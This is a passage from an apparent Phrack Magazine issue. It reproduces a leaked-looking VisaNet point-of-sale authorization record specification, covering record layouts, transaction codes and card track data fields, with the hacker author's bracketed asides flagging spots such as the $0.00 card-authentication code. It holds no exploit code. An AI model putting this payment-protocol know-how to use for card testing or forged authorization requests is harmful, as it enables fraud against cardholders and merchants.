  11037.  
  11038. For the file hungry, Dialcom offers several file transfer programs,
  11039. including KERMIT and Dialcom's FT, which implements most popular
  11040. protocols, like Zmodem, Xmodem, etc.
  11041.  
  11042. A small number of other fun things to try:
  11043.  
  11044. NET-TALK        The ``interactive computer conferencing system'' -- build
  11045.                 your private IRC!
  11046.  
  11047. CRYPTO          Dialcom's encryption program.  Something they're probably
  11048.                 going to love on sci.crypt.
  11049.  
  11050. NUSAGE          By far one of the better things to do on Dialcom, it was
  11051.                 left out of this file because it is simply huge.  This
  11052.                 program allows the user (typically an administrator) to
  11053.                 monitor network usage, sort the data, store it, peek
  11054.                 into all the little details (virtual connection types,
  11055.                 remote/local addresses, actions, time, commands, etc).
  11056.                 Unfortunately, it's completely beyond the scope of this
  11057.                 file, as there are tons of switches and options to use
  11058.                 in order to put this program to effective use.
  11059.  
  11060.                               ==Phrack Magazine==
  11061.  
  11062.                  Volume Five, Issue Forty-Six, File 15 of 28
  11063.  
  11064. ****************************************************************************
  11065.  
  11066.                             visanetoperations; part1
  11067.  
  11068.                               obtainedandcompiled
  11069.  
  11070.                                        by
  11071.  
  11072.                                      icejey
  11073.                                        /\
  11074.    lowerfeldafederationforundercasing iiu delamolabz chuchofthenoncomformist
  11075.                                        &&
  11076.                          theilluminatibarbershopquartet
  11077.  
  11078.  greetz2; drdelam maldoror greenparadox kaleidox primalscream reddeath kerryk
  11079. -------------------------- [ typed in true(c) 80 columns] ----------------------
  11080. ---------------------------- [ comments appear in []s ] ------------------------
  11081.  
  11082.                                 [ section one ]
  11083.                             [ from the word of god ]
  11084.  
  11085.           -------------------------------------------------------------
  11086.           |  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  |
  11087.           |  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  |
  11088.           |    \\\\\     /////  /////  //////////// /////\\\\         |
  11089.           |     \\\\\   /////  /////  /////        /////  \\\\\       |
  11090.           |      \\\\\ /////  /////  ///////////  \\\\\\\\\\\\\\      |
  11091.           |       \\\\\///   /////        /////  \\\\\\\\\\\\\\\\     |
  11092.           |        \\\\\/   ///// ////////////  /////        \\\\\    |
  11093.           |  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  |
  11094.           |  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  |
  11095.           -------------------------------------------------------------
  11096.  
  11097.                         EXTERNAL INTERFACE SPECIFICATION
  11098.                         --------------------------------
  11099.                                SECOND GENERATION
  11100.                           AUTHORIZATION RECORD FORMATS
  11101.  
  11102.                                For Record Formats
  11103.                            --------------------------
  11104.                                 J - PS/2000 REPS
  11105.                              G - VisaNet Dial Debit
  11106.  
  11107. 1.0 INTRODUCTION
  11108.  
  11109.  2.0 APPLICABLE DOCUMENTS
  11110.     2.01 RELATED VISA DOCUMENTS FOR AUTHORIZATION
  11111.     2.02 RELATED VISA DOCUMENTS FOR DATA CAPTURE
  11112.  
  11113. 3.0 AUTHORIZATION RECORD FORMATS
  11114.     3.01 REQUEST RECORD FORMAT
  11115.     3.02 RESPONSE RECORD FORMAT
  11116.  
  11117. 4.0 REQUEST RECORD DATA ELEMENT DEFINITIONS
  11118.     4.01 RECORD FORMAT
  11119.     4.02 APPLICATION TYPE
  11120.     4.03 MESSAGE DELIMITER
  11121.     4.04 ACQUIRER BIN
  11122.     4.05 MERCHANT NUMBER
  11123.     4.06 STORE NUMBER
  11124.     4.07 TERMINAL NUMBER
  11125.     4.08 MERCHANT CATEGORY CODE
  11126.     4.09 MERCHANT COUNTRY CODE
  11127.     4.10 MERCHANT CITY CODE
  11128.     4.11 TIME ZONE DIFFERENTIAL
  11129.     4.12 AUTHORIZATION TRANSACTION CODE
  11130.     4.13 TERMINAL IDENTIFICATION NUMBER
  11131.     4.14 PAYMENT SERVICE INDICATOR
  11132.     4.15 TRANSACTION SEQUENCE NUMBER
  11133.     4.16 CARDHOLDER IDENTIFICATION DATA
  11134.     4.17 ACCOUNT DATA SOURCE
  11135.     4.18 CUSTOMER DATA FIELD
  11136.        4.18.1 TRACK 1 READ DATA
  11137.        4.18.2 TRACK 2 READ DATA
  11138.        4.18.3 MANUALLY ENTERED ACCOUNT DATA (CREDIT CARD)
  11139.           4.18.3.1 MANUALLY ENTERED ACCOUNT NUMBER
  11140.           4.18.3.2 MANUALLY ENTERED EXPIRATION DATE
  11141.        4.18.4 CHECK ACCEPTANCE IDENTIFICATION NUMBER
  11142.           4.18.4.1 CHECK ACCEPTANCE ID
  11143.           4.18.4.2 MANUALLY ENTERED CHECK ACCEPTANCE DATA
  11144.     4.19 FIELD SEPARATOR
  11145.     4.20 CARDHOLDER IDENTIFICATION DATA
  11146.        4.20.1 STATIC KEY WITH TWENTY THREE BYTE CARDHOLDER ID
  11147.        4.20.2 STATIC KEY WITH THIRTY TWO BYTE CARDHOLDER ID
  11148.        4.20.3 DUK/PT KEY WITH THIRTY TWO BYTE CARDHOLDER ID
  11149.        4.20.4 ADDRESS VERIFICATION SERVICE DESCRIPTION [hmmm...]
  11150.     4.21 FIELD SEPARATOR
  11151.     4.22 TRANSACTION AMOUNT
  11152.     4.23 FIELD SEPARATOR
  11153.     4.24 DEVICE CODE/INDUSTRY CODE
  11154.     4.25 FIELD SEPARATOR
  11155.     4.26 ISSUING INSTITUTION ID/RECEIVING INSTITUTION ID
  11156.     4.27 FIELD SEPARATOR
  11157.     4.28 SECONDARY AMOUNT (CASHBACK)
  11158.     4.29 FIELD SEPARATOR
  11159.     4.30 MERCHANT NAME
  11160.     4.31 MERCHANT CITY
  11161.     4.32 MERCHANT STATE
  11162.     4.33 SHARING GROUP
  11163.     4.34 FIELD SEPARATOR
  11164.     4.35 MERCHANT ABA NUMBER
  11165.     4.36 MERCHANT SETTLEMENT AGENT NUMBER
  11166.     4.37 FIELD SEPARATOR
  11167.     4.38 AGENT NUMBER
  11168.     4.39 CHAIN NUMBER
  11169.     4.40 BATCH NUMBER
  11170.     4.41 REIMBURSEMENT ATTRIBUTE
  11171.     4.42 FIELD SEPARATOR
  11172.     4.43 APPROVAL CODE
  11173.     4.44 SETTLEMENT DATE
  11174.     4.45 LOCAL TRANSACTION DATE
  11175.     4.46 LOCAL TRANSACTION TIME
  11176.     4.47 SYSTEM TRACE AUDIT NUMBER
  11177.     4.48 ORIGINAL AUTHORIZATION TRANSACTION CODE
  11178.     4.49 NETWORK IDENTIFICATION CODE
  11179.     4.50 FIELD SEPARATOR
  11180.  
  11181. 5.0 RESPONSE RECORD DATA ELEMENT DEFINITIONS
  11182.     5.01 PAYMENT SERVICE INDICATOR
  11183.     5.02 STORE NUMBER
  11184.     5.03 TERMINAL NUMBER
  11185.     5.04 AUTHORIZATION SOURCE CODE
  11186.     5.05 TRANSACTION SEQUENCE NUMBER
  11187.     5.06 RESPONSE CODE
  11188.     5.07 APPROVAL CODE
  11189.     5.08 LOCAL TRANSACTION DATE
  11190.     5.09 AUTHORIZATION RESPONSE CODE
  11191.     5.10 AVS RESULT CODE
  11192.     5.11 TRANSACTION IDENTIFIER
  11193.     5.12 FIELD SEPARATOR
  11194.     5.13 VALIDATION CODE
  11195.     5.14 FIELD SEPARATOR
  11196.     5.15 NETWORK IDENTIFICATION CODE
  11197.     5.16 SETTLEMENT DATE
  11198.     5.17 SYSTEM TRACE AUDIT NUMBER
  11199.     5.18 RETRIEVAL REFERENCE NUMBER
  11200.     5.19 LOCAL TRANSACTION TIME
  11201.  
  11202. 6.0 CONFIRMATION RECORD DATA ELEMENT DEFINITIONS
  11203.     6.01 NETWORK IDENTIFICATION CODE
  11204.     6.02 SETTLEMENT DATE
  11205.     6.03 SYSTEM TRACE AUDIT NUMBER
  11206.  
  11207. 7.0 CHARACTER CODE DEFINITIONS
  11208.     7.01 TRACK 1 CHARACTER DEFINITION
  11209.     7.02 TRACK 2 CHARACTER DEFINITION
  11210.     7.03 AUTHORIZATION MESSAGE CHARACTER SET
  11211.     7.04 CHARACTER CONVERSION SUMMARY
  11212.     7.05 ACCOUNT DATA LUHN CHECK
  11213.     7.06 CALCULATING AN LRC
  11214.     7.07 TEST DATA FOR RECORD FORMAT "J"
  11215.       7.07.1 TEST DATA FOR A FORMAT "J" AUTHORIZATION REQUEST
  11216.       7.07.2 RESPONSE MESSAGE FOR TEST DATA
  11217.  
  11218. -------------------------------------------------------------------------------
  11219.  
  11220. 1.0 INTRODUCTION
  11221.  
  11222. This document describes the request and response record formats for the VisaNet
  11223. second generation Point-Of-Sale (POS) authorization terminals and VisaNet
  11224. Authorization services.  This document describes only record formats.  Other
  11225. documents describe communication protocols and POS equipment processing
  11226. requirements.  Figure 1.0 represents the authorization request which is
  11227. transmitted to VisaNet using public communication services and the
  11228. authorization response returned by VisaNet.  Debit transactions include a
  11229. third confirmation message.
  11230.  
  11231. POS DEVICE                                          VISANET
  11232. ----------                                          -------
  11233.  
  11234. AUTHORIZATION
  11235.   REQUEST
  11236.     |           TRANSMITTED TO A
  11237.     |---------->    VISANET                       AUTHORIZATION
  11238.                  AUTHORIZATION                      RESPONSE
  11239.                   HOST SYSTEM                          |
  11240.                                                        |
  11241.                              RETURNED BY THE           |
  11242.                              VISANET HOST TO  <--------|
  11243.                              THE POS TERMINAL
  11244.  
  11245. DEBIT RESPONSE
  11246. CONFIRMATION--------------->TRANSMITTED TO
  11247.                             HOST SYSTEM
  11248.  
  11249.                                    FIGURE 1.0
  11250.                       Authorization request and response.
  11251.  
  11252. This document describes the record formats to be used for the development of
  11253. new applications.  Current formats or transition formats will be provided on
  11254. request.  The usage of some fields have changed with the new record formats.
  11255. Applications which were developed to previous specifications will continue to
  11256. be supported by VisaNet services.  The new formats and field usage is provided
  11257. with the intention of moving all new applications developed to the new formats.
  11258.  
  11259. 2.0 APPLICABLE DOCUMENTS
  11260.  
  11261.    The following documents provide additional definitions and background.
  11262.  
  11263. 2.01 RELATED VISA DOCUMENTS FOR AUTHORIZATION
  11264.  
  11265.   1. EIS1051 - External Interface Specification
  11266.                    Second Generation
  11267.             Authorization Link Level Protocol
  11268.  
  11269. 2.02 RELATED VISA DOCUMENTS FOR DATA CAPTURE
  11270.  
  11271.    1. EIS1081 - External Interface Specification
  11272.                     Second Generation
  11273.               Data Capture Record Formats
  11274.  
  11275.    2. EIS1052 - External Interface Specification
  11276.                     Second Generation
  11277.               Data Capture Link Level Protocol
  11278.  
  11279. 3.0 AUTHORIZATION RECORD FORMATS
  11280.  
  11281. This section contains the record formats for the authorization request,
  11282. response and confirmation records.  The ANSI X3.4 character set is used to
  11283. represent all record data elements.  (See Section 7)
  11284.  
  11285. In the record formats on the following pages, the column heading FORMAT is
  11286. defined as:
  11287.  
  11288. "NUM"  represents numeric data, the numbers 0 through 9, NO SPACES.
  11289. "A/N"  represents alphanumeric data, the printing character set.
  11290. "FS"   represents a field separator character as defined in ANSI X3.4 as
  11291.        a "1C" hex
  11292.  
  11293. 3.01 REQUEST RECORD FORMAT
  11294.  
  11295. Table 3.01b provides the record format for the authorization request records.
  11296. Section 4 provides the data element definitions.
  11297.  
  11298. The authorization request record is a variable length record.  The record
  11299. length will depend on the source of the customer data and the type of
  11300. authorization request.  Refer to Table 3.01c to determine which GROUPS to use
  11301. from Table 3.01a
  11302.  
  11303. TABLE 3.01a IS PROVIDED FOR REFERENCE REASONS ONLY.  ALL NEW APPLICATIONS
  11304.             SHOULD USE ONE OF THE FOLLOWING RECORD FORMATS:
  11305.  
  11306. RECORD  | APPLICATION |
  11307. FORMAT  |    TYPE     | REMARKS
  11308. -------------------------------------------------------------------------------
  11309.    J    |   CREDIT    | All non-ATM card transactions (Visa cards, other credit
  11310.         |             | cards, private label credit cards and check guarantee)
  11311.    G    | DIAL DEBIT  | Visa supported ATM debit cards
  11312.  
  11313. The selection of format type J and G or any other value from Table 3.01a will
  11314. depend on the VisaNet services that are desired.  Contact your Visa POS member
  11315. support representative for assistance in determining the required formats.
  11316.  
  11317.                                   TABLE 3.01a
  11318.                              Record Format Summary
  11319.  
  11320.  Non-CVV       CVV       Terminal
  11321. Compliant   Compliant   Generation   Description
  11322. -------------------------------------------------------------------------------
  11323.                 0                    RESERVED
  11324.     1           N         First      Vutran
  11325.     2           8         First      Sweda
  11326.     4           R         First      Verifone
  11327.     6           P         First      Amex
  11328.     7           3         First      Racal
  11329.     A           Q         First      DMC
  11330.     B           R         First      GTE & Omron    [velly intelestink]
  11331.     C           9         First      Taltek
  11332.     S           U         First      Datatrol - Standard Oil
  11333.     D           T         First      Datatrol
  11334.     E                                RESERVED
  11335.     5           F         Second     Non-REPS-Phase 1 CVV
  11336.                 G         Second     Dial Debit
  11337.                 H         Second     Non-REPS-Phase 2 CVV
  11338.                 I         Second     RESERVED - Non-REPS Controller
  11339.                 J         Second     REPS - Terminal & Controller
  11340.                 K         Second     RESERVED
  11341.                 L         Second     RESERVED - Leased VAP
  11342.                 M         Second     RESERVED - Member Format
  11343.                N-O                   RESERVED
  11344.                V-Y                   RESERVED
  11345.                 Z         Second     RESERVED - SDLC Direct [hmmm]
  11346. -------------------------------------------------------------------------------
  11347.  
  11348.                                   TABLE 3.01b
  11349.              Second Generation Authorization Request Record Format
  11350.  
  11351.                                                                         see
  11352. Group  Byte#  Length  Format  Name                                    section
  11353. -------------------------------------------------------------------------------
  11354.          1      1      A/N    Record Format                             4.01
  11355.          2      1      A/N    Application Type                          4.02
  11356.          3      1      A/N    Message Delimiter                         4.03
  11357.         4-9     6      NUM    Acquirer Bin                              4.04
  11358.        10-21   12      NUM    Merchant Number                           4.05
  11359.        22-25    4      NUM    Store Number                              4.06
  11360.        26-29    4      NUM    Terminal Number                           4.07
  11361.        30-33    4      NUM    Merchant Category Code                    4.08
  11362.        34-36    3      NUM    Merchant Country Code                     4.09
  11363.        37-41    5      A/N    Merchant City Code (ZIP in the U.S.)      4.10
  11364.        42-44    3      NUM    Time Zone Differential                    4.11
  11365.        45-46    2      A/N    Authorization Transaction Code            4.12
  11366.        47-54    8      NUM    Terminal Identification Number            4.13
  11367.         55      1      A/N    Payment Service Indicator                 4.14
  11368.        56-59    4      NUM    Transaction Sequence Number               4.15
  11369.         60      1      A/N    Cardholder Identification Code            4.16
  11370.         61      1      A/N    Account Data Field                        4.17
  11371.      Variable  1-76           Customer Data Field                       4.18.x
  11372.                               (See: DEFINITIONS in Table 3.01d)
  11373.      Variable   1      "FS"   Field Separator                           4.19
  11374.      Variable  0-32    A/N    Cardholder Identification Data            4.20
  11375.      Variable   1      "FS"   Field Separator                           4.21
  11376.      Variable  3-12    NUM    Transaction Amount                        4.22
  11377.      Variable   1      "FS"   Field Separator                           4.23
  11378.      Variable   2      A/N    Device Code/Industry Code                 4.24
  11379.      Variable   1      "FS"   Field Separator                           4.25
  11380.      Variable  0-6     NUM    Issuing/Receiving Institution ID          4.26
  11381.  I   Variable   1      "FS"   Field Separator                           4.27
  11382.      Variable  3-12    NUM    Secondary Amount (Cashback)               4.28
  11383. II   Variable   1      "FS"   Field Separator                           4.29
  11384.      Variable   25     A/N    Merchant Name                             4.30
  11385.      Variable   13     A/N    Merchant City                             4.31
  11386.      Variable   2      A/N    Merchant State                            4.33
  11387.      Variable  1-14    A/N    Sharing Group                             4.33
  11388.      Variable   1      "FS"   Field Separator                           4.34
  11389.      Variable  0-12    NUM    Merchant ABA                              4.35
  11390.      Variable  0-4     NUM    Merchant Settlement Agent Number          4.36
  11391.      Variable   1      "FS"   Field Separator                           4.37
  11392.      Variable   6      NUM    Agent Number                              4.38
  11393.      Variable   6      NUM    Chain Number                              4.39
  11394.      Variable   3      NUM    Batch Number                              4.40
  11395.      Variable   1      A/N    Reimbursement Attribute                   4.41
  11396. III  Variable   1      "FS"   Field Separator                           4.42
  11397.      Variable   6      A/N    Approval Code                             4.43
  11398.      Variable   4      NUM    Settlement Date (MMDD)                    4.44
  11399.      Variable   4      NUM    Local Transaction Date (MMDD)             4.45
  11400.      Variable   6      NUM    Local Transaction Time (HHMMSS)           4.46
  11401.      Variable   6      A/N    System Trace Audit Number                 4.47
  11402.      Variable   2      A/N    Original Auth. Transaction Code           4.48
  11403.      Variable   1      A/N    Network Identification Code               4.49
  11404. IV   Variable   1      "FS"   Field Separator                           4.50
  11405.  
  11406. NOTE: The maximum length request can be as long as 290 bytes for an Interlink
  11407. Debit Cancel request (including the STX/ETX/LRC).  Since some terminals may be
  11408. limited to a 256 byte message buffer, the following tips can save up to 36
  11409. bytes:
  11410.  
  11411.      - Limit fields 4.22 and 4.28 to 7 digits
  11412.      - Fields 4.26, 4.35 and 4.36 are not required for a debit request
  11413.      - Field 4.33 can be limited to 10 bytes
  11414.  
  11415.                                   TABLE 3.01C
  11416.                       Legend for GROUP (from Table 3.01b)
  11417.  
  11418. FOR THESE TRANSACTIONS, USE--------------------------------->GROUPS      RECORD
  11419.                                                           I  II III IV   FORMAT
  11420.  
  11421. Check guarantee                                           X                J
  11422.  
  11423. Non-ATM card transactions (Visa cards, other              X  X             J
  11424. credit cards, private label credit cards
  11425.  
  11426. Visa supported ATM debit cards: Purchase, Return          X  X   X         G
  11427. and Inquiry Request
  11428.  
  11429. Visa supported ATM debit cards: Interlink Cancel          X  X   X   X     G
  11430. Request
  11431.  
  11432.                                   TABLE 3.01d
  11433.              Definitions for Customer Data Field (from Table 3.01b)
  11434.  
  11435. Length        Format        Field Name                                   See
  11436.                                                                        Section
  11437. MAGNETICALLY read credit cards (SELECT ONE):
  11438. up to 76       A/N          Track 1 Read Data                           4.18.1
  11439. up to 37       NUM          Track 2 Read Data                           4.18.2
  11440.  
  11441. MANUALLY entered credit cards:
  11442. up to 28       NUM          Manually Entered Account Number            4.18.3.1
  11443.    1           "FS"         Field Separator
  11444.    4           NUM          Manually Entered Expiration Date (MMYY)   4.18.3.2
  11445.  
  11446. MACHINE read and MANUALLY entered check acceptance requests:
  11447.  1 to 28       A/N          Check Acceptance ID                        4.18.4.1
  11448.    1           "FS"         Field Separator                            4.18.4.2
  11449.  3 to 6        A/N          Manually Entered Check Acceptance Data     4.18.4.2
  11450.  
  11451. MAGNETICALLY read ATM debit cards:
  11452. up to 37       NUM          Track 2 Read Data                           4.18.2
  11453.  
  11454. 3.02 RESPONSE RECORD FORMAT
  11455.  
  11456. Table 3.02a provides the record format for the authorization response records.
  11457. Section 5 provides the data element definitions.
  11458.  
  11459. The authorization response record is variable length for record formats "J" &
  11460. "G".  Refer to Table 3.02b to determine which GROUPS to use from Table 3.02a.
  11461.  
  11462.                                   Table 3.02a
  11463.                 Second Generation Authorization Response Record
  11464.                                                                         see
  11465. Group  Byte#  Length  Format  Name                                    section
  11466. --------------------------------------------------------------------------------
  11467.         1       1      A/N    Payment Service Indicator                 5.01
  11468.        2-5      4      NUM    Store Number                              5.02
  11469.        6-9      4      NUM    Terminal Number                           5.03
  11470.         10      1      A/N    Authorization Source Code                 5.04
  11471.       11-14     4      NUM    Transaction Sequence Number               5.05
  11472.       15-16     2      A/N    Response Code                             5.06
  11473.       17-22     6      A/N    Approval Code                             5.07
  11474.       23-28     6      NUM    Local Transaction Date (MMDDYY)           5.08
  11475.       29-44     16     A/N    Authorization Response Message            5.09
  11476.        45       1      A/N    AVS Result Code                           5.10
  11477.     Variable   0/15    NUM    Transaction Identifier                    5.11
  11478.     Variable    1      "FS"   Field Separator                           5.12
  11479.     Variable   0/4     A/N    Validation Code                           5.13
  11480. I   Variable    1      "FS"   Field Separator                           5.14
  11481.     Variable    1      A/N    Network Identification Code               5.15
  11482.     Variable    4      NUM    Settlement Date (MMDD)                    5.16
  11483.     Variable    6      A/N    System Trace Audit Number                 5.17
  11484.     Variable    12     A/N    Retrieval Reference Number                5.18
  11485. II  Variable    6      NUM    Local Transaction Time (HHMMSS)           5.19
  11486.  
  11487.                                   Table 3.02b
  11488.                       Legend for GROUP (from Table 3.02a)
  11489.  
  11490. FOR THESE TRANSACTIONS, USE--------------------------------->GROUPS      RECORD
  11491.                                                              I   II      FORMAT
  11492.  
  11493. All non-ATM card transactions (Visa cards, other credit      X             J
  11494. cards, private label credit cards and check guarantee)
  11495.  
  11496. Visa supported ATM debit cards: Purchase, Return, Inquiry    X    X        G
  11497. Request and Interlink Cancel Request
  11498.  
  11499. 3.03 CONFIRMATION RECORD FORMAT (ATM DEBIT ONLY)
  11500.  
  11501. Table 3.03 provides the record format for the second generation debit response
  11502. confirmation record.  Section 6 provides the data element definitions.
  11503.  
  11504. The debit response confirmation record is a fixed length record.
  11505.  
  11506.                                    TABLE 3.03
  11507.               Second Generation Debit Response Confirmation Record
  11508.  
  11509.                                                                         see
  11510. Group  Byte#  Length  Format  Name                                    section
  11511. --------------------------------------------------------------------------------
  11512.          1      1      A/N    Network ID Code                           6.01
  11513.         2-5     4      NUM    Settlement Date (MMDD)                    6.02
  11514. I       6-11    6      A/N    System Trace Audit Number                 6.03
  11515.  
  11516. 4.0 REQUEST RECORD DATA ELEMENT DEFINITIONS
  11517.  
  11518. The following subsections will define the authorization request record data
  11519. elements.
  11520.  
  11521. 4.01 RECORD FORMAT
  11522.  
  11523. There are several message formats defined within the VisaNet systems.  The
  11524. second generation authorization format is specified by placing one of the
  11525. defined values in the record format field.  Table 4.01 provides a brief summary
  11526. of the current formats.
  11527.  
  11528.                                    TABLE 4.01
  11529.                 VisaNet Authorization Record Format Designators
  11530.  
  11531. RECORD FORMAT                        RECORD DESCRIPTION
  11532. --------------------------------------------------------------------------------
  11533.       J             All non-ATM card transactions (Visa cards, other credit
  11534.                     cards, private label credit cards and check guarantee)
  11535.       G             Visa supported ATM debit cards
  11536.  
  11537. 4.02 APPLICATION TYPE
  11538.  
  11539. The VisaNet authorization system supports multiple application types ranging
  11540. from single thread first generation authorization to interleaved leased line
  11541. authorization processing.  Table 4.02 provides a summary of application type.
  11542.  
  11543.                                    TABLE 4.02
  11544.                         VisaNet Application Designators
  11545.  
  11546. APPLICATION                                                        USE WITH
  11547.    TYPE             APPLICATION DESCRIPTION                        REC. FMT.
  11548. --------------------------------------------------------------------------------
  11549.     0               Single authorization per connection             J and G
  11550.     2               Multiple authorizations per connection          J and G
  11551.                     single-threaded
  11552.     4               Multiple authorizations per connect,               J
  11553.                     interleaved
  11554.     6               Reserved for future use                           ---
  11555.     8               Reserved for future use                           ---
  11556.  1,3,5,7            Reserved for VisaNet Central Data Capture (CDC)   ---
  11557.     9               Reserved for VisaNet Down Line Load               ---
  11558.    A-Z              Reserved for future use                           ---
  11559.  
  11560. 4.03 MESSAGE DELIMITER
  11561.  
  11562. The message delimiter separates the format and application type designators from
  11563. the body of the message.  The message delimiter is defined as a "." (period)
  11564.  
  11565. 4.04 ACQUIRER BIN
  11566.  
  11567. This field contains the Visa assigned six-digit Bank Identification Number (BIN)
  11568. The acquirer BIN identifies the merchant signing member that signed the merchant
  11569. using the terminal.
  11570.  
  11571. NOTE: The merchant receives this number from their signing member.
  11572.  
  11573. 4.05 MERCHANT NUMBER
  11574.  
  11575. This field contains a NON-ZERO twelve digit number, assigned by the signing
  11576. member and/or the merchant, to identify the merchant within the member systems.
  11577. The combined Acquirer BIN and Merchant Number are required to identify the
  11578. merchant within the VisaNet systems.
  11579.  
  11580. 4.06 STORE NUMBER
  11581.  
  11582. This field contains a NON-ZERO four-digit number assigned by the signing member
  11583. and/or the merchant to identify the merchant store within the member systems.
  11584. The combined Acquirer BIN, Merchant Number, and Store Number are required to
  11585. identify the store within the VisaNet systems.
  11586.  
  11587. 4.07 TERMINAL NUMBER
  11588.  
  11589. This field contains a NON-ZERO four-digit number assigned by the signing member
  11590. and/or the merchant to identify the merchant store within the member systems.
  11591. This field can be used by systems which use controllers and/or concentrators to
  11592. identify the devices attached to the controllers and/or concentrators.
  11593.  
  11594. 4.08 MERCHANT CATEGORY CODE
  11595.  
  11596. This field contains a four-digit number assigned by the signing member from a
  11597. list of category codes defined in the VisaNet Merchant Data Standards Handbook
  11598. to identify the merchant type.
  11599.  
  11600. 4.09 MERCHANT COUNTRY CODE
  11601.  
  11602. This field contains a three-digit number assigned by the signing member from a
  11603. list of country codes defined in the VisaNet V.I.P. System Message Format
  11604. Manuals to identify the merchant location country.
  11605.  
  11606. 4.10 MERCHANT CITY CODE
  11607.  
  11608. This field contains a five character code used to further identify the merchant
  11609. location.  Within the United States, the give high order zip code digits of the
  11610. address of the store location are used.  Outside of the United States, this
  11611. field will be assigned by the signing member.
  11612.  
  11613. 4.11 TIME ZONE DIFFERENTIAL
  11614.  
  11615. This field contains a three-digit code used to calculate the local time within
  11616. the VisaNet authorization system.  It is calculated by the signing member,
  11617. providing the local time zone differential from Greenwich Mean Time (GMT).  The
  11618. first two digits specify the magnitude of the differential.  Table 4.11 provides
  11619. a brief summary of the Time Zone Differential codes.
  11620.  
  11621.                                    TABLE 4.11
  11622.                        Time Zone Differential Code Format
  11623.  
  11624.    Byte #     Length     Format                     Contents
  11625. --------------------------------------------------------------------------------
  11626.      1          1        NUMERIC          DIRECTION
  11627.                                           0 = Positive, Local Ahead of GMT,
  11628.                                               offset in hours
  11629.                                           1 = Negative, Local Time behind GMT,
  11630.                                               offset in hours
  11631.                                           2 = Positive, offset in 15 minute
  11632.                                               increments
  11633.                                           3 = Negative, offset in 15 minute
  11634.                                               increments
  11635.                                           4 = Positive, offset in 15 minute
  11636.                                               increments, participating in
  11637.                                               daylight savings time
  11638.                                           5 = Negative, offset in 15 minute
  11639.                                               increments, participating in
  11640.                                               daylight savings time
  11641.                                         6-9 = INVALID CODES
  11642.    2-3           2       NUMERIC           MAGNITUDE
  11643.                                            For Byte #1 = 0 or 1
  11644.                                                0 <= MAGNITUDE <= 12
  11645.                                            For Byte #1 = 2 through 5
  11646.                                                0 <= MAGNITUDE <= 48
  11647. --------------------------------------------------------------------------------
  11648. A code of 108 indicates the local Pacific Standard time which is 8 hours behind
  11649. GMT.
  11650.  
  11651. 4.12 AUTHORIZATION TRANSACTION CODE
  11652.  
  11653. This field contains a two-character code defined by VisaNet and generated by the
  11654. terminal identifying the type of transaction for which the authorization is
  11655. requested.  Table 4.12 provides a summary of the transaction codes.
  11656.  
  11657.                                    TABLE 4.12
  11658.                         Authorization Transaction Codes
  11659.  
  11660. TRAN
  11661. CODE       TRANSACTION DESCRIPTION
  11662. -------------------------------------------------------------------------------
  11663. 54         Purchase
  11664. 55         Cash Advance
  11665. 56         Mail/Telephone Order
  11666. 57         Quasi Cash
  11667. 58         Card Authentication - Transaction Amt & Secondary Amt must equal
  11668.            $0.00, AVS may be requested [ah-hah!]
  11669. 64         Repeat: Purchase
  11670. 65         Repeat: Cash Advance
  11671. 66         Repeat: Mail/Telephone Order (MO/TO)
  11672. 67         Repeat: Quasi Cash
  11673. 68         Repeat: Card Authentication - Transaction Amt & Secondary Amt must
  11674.            equal $0.00, AVS may be requested
  11675. 70         Check guarantee, must include RIID (field 4.26)
  11676. 81         Proprietary Card
  11677. 84         Private Label Purchase
  11678. 85         Private Label, Cash Advance
  11679. 86         Private Label Mail/Telephone Order (MO/TO)
  11680. 87         Private Label Quasi Cash
  11681. 88         Private Label Card Authentication - Transaction Amt & Secondary Amt
  11682.            must equal $0.00, AVS may be requested
  11683. 93         Debit Purchase
  11684. 94         Debit Return
  11685. 95         Interlink Debit Cancel (see NOTE below)
  11686. --------------------------------------------------------------------------------
  11687.  
  11688. NOTE (for TRANSACTION CODE = 95)
  11689. --------------------------------
  11690.     - For Interlink Debit CANCEL request message, all of the fields in
  11691.       Groups I and II will come from the original transaction request or the
  11692.       original transaction response, with the exception of the following:
  11693.          - The AUTHORIZATION TRANSACTION CODE will need to be changed to the
  11694.            Debit CANCEL code.
  11695.          - The TRANSACTION SEQUENCE NUMBER should be incremented in the
  11696.            normal fashion.
  11697.          - The CUSTOMER DATA FIELD and the CARDHOLDER IDENTIFICATION DATE
  11698.            (PIN) will need to be re-entered.
  11699.  
  11700. 4.13 TERMINAL IDENTIFICATION NUMBER
  11701.  
  11702. This field contains an eight-digit code that must be greater than zero, defined
  11703. by the terminal down line load support organization.  Support may be provided by
  11704. the Visa's Merchant Assistance Center (MAC), the signing member, or a third
  11705. party organization.  The terminal ID is used to uniquely identify the terminal
  11706. in the terminal support system and identification for the VisaNet Central Data
  11707. Capture (CDC).  The terminal ID may not be unique within the VisaNet system.
  11708. Each terminal support provider and member that provides its own terminal support
  11709. can assign potentially identical terminal IDs within its system.  The terminal
  11710. ID can be used by the terminal down line load system to access the terminal
  11711. application and parameter data from a system data base when down line loading a
  11712. terminal. [huh?]
  11713.  
  11714. NOTE: It is recommended that [the] Terminal ID Number should be unique within
  11715. the same Acquirer's BIN.
  11716.  
  11717. 4.14 PAYMENT SERVICE INDICATOR
  11718.  
  11719. This is a one-character field used to indicate a request for REPS qualification.
  11720. Table 4.14 provides a summary of the codes.
  11721.  
  11722.                                    TABLE 4.14
  11723.                         Payment Service Indicator Codes
  11724.  
  11725.                          RECORD
  11726.                          FORMAT    VALUE    DESCRIPTION
  11727.                          ------------------------------
  11728.                            J         Y         Yes
  11729.                            J         N         No
  11730.                            G         Y         Yes
  11731.                            G         N         No
  11732.                          ------------------------------ [repetitive? you bet]
  11733.  
  11734. 4.15 TRANSACTION SEQUENCE NUMBER
  11735.  
  11736. This field contains a four-digit code which is generated by the terminal as the
  11737. sequence number for the transaction.  The sequence number is used by the
  11738. terminal to match request and response messages.  This field is returned by
  11739. VisaNet without sequence verification.  The sequence number is incremented with
  11740. wrap from 9999 to 0001.
  11741.  
  11742. 4.16 CARDHOLDER IDENTIFICATION CODE
  11743.  
  11744. This one-character field contains a code that indicates the method used to
  11745. identify the cardholder.  Table 4.16 provides a summary of the codes.
  11746.  
